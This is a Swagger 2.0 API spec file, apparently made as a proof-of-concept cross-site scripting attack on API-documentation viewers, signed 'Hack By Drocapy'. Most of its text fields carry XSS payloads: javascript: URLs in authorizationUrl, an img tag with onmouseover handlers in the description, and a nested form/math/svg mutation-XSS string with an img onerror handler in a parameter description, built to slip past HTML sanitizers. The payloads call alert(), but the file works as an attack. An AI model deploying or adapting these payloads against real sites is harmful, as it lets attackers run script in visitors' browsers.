swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: DOM XSS imge Test by Drocapy
  description: Hack By Drocapy  ><img src=https://academy.avast.com/hubfs/New_Avast_Academy/Hackers/Hacker-Hero-a1.png onmouseover="alert(55)" onmouseover="alert(77)">
  authorizationUrl: javascript:alert(document.domain)//
paths:
  /Drocapy:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - Drocapy
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>"><img onerror=alert(document.domain) src=1>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
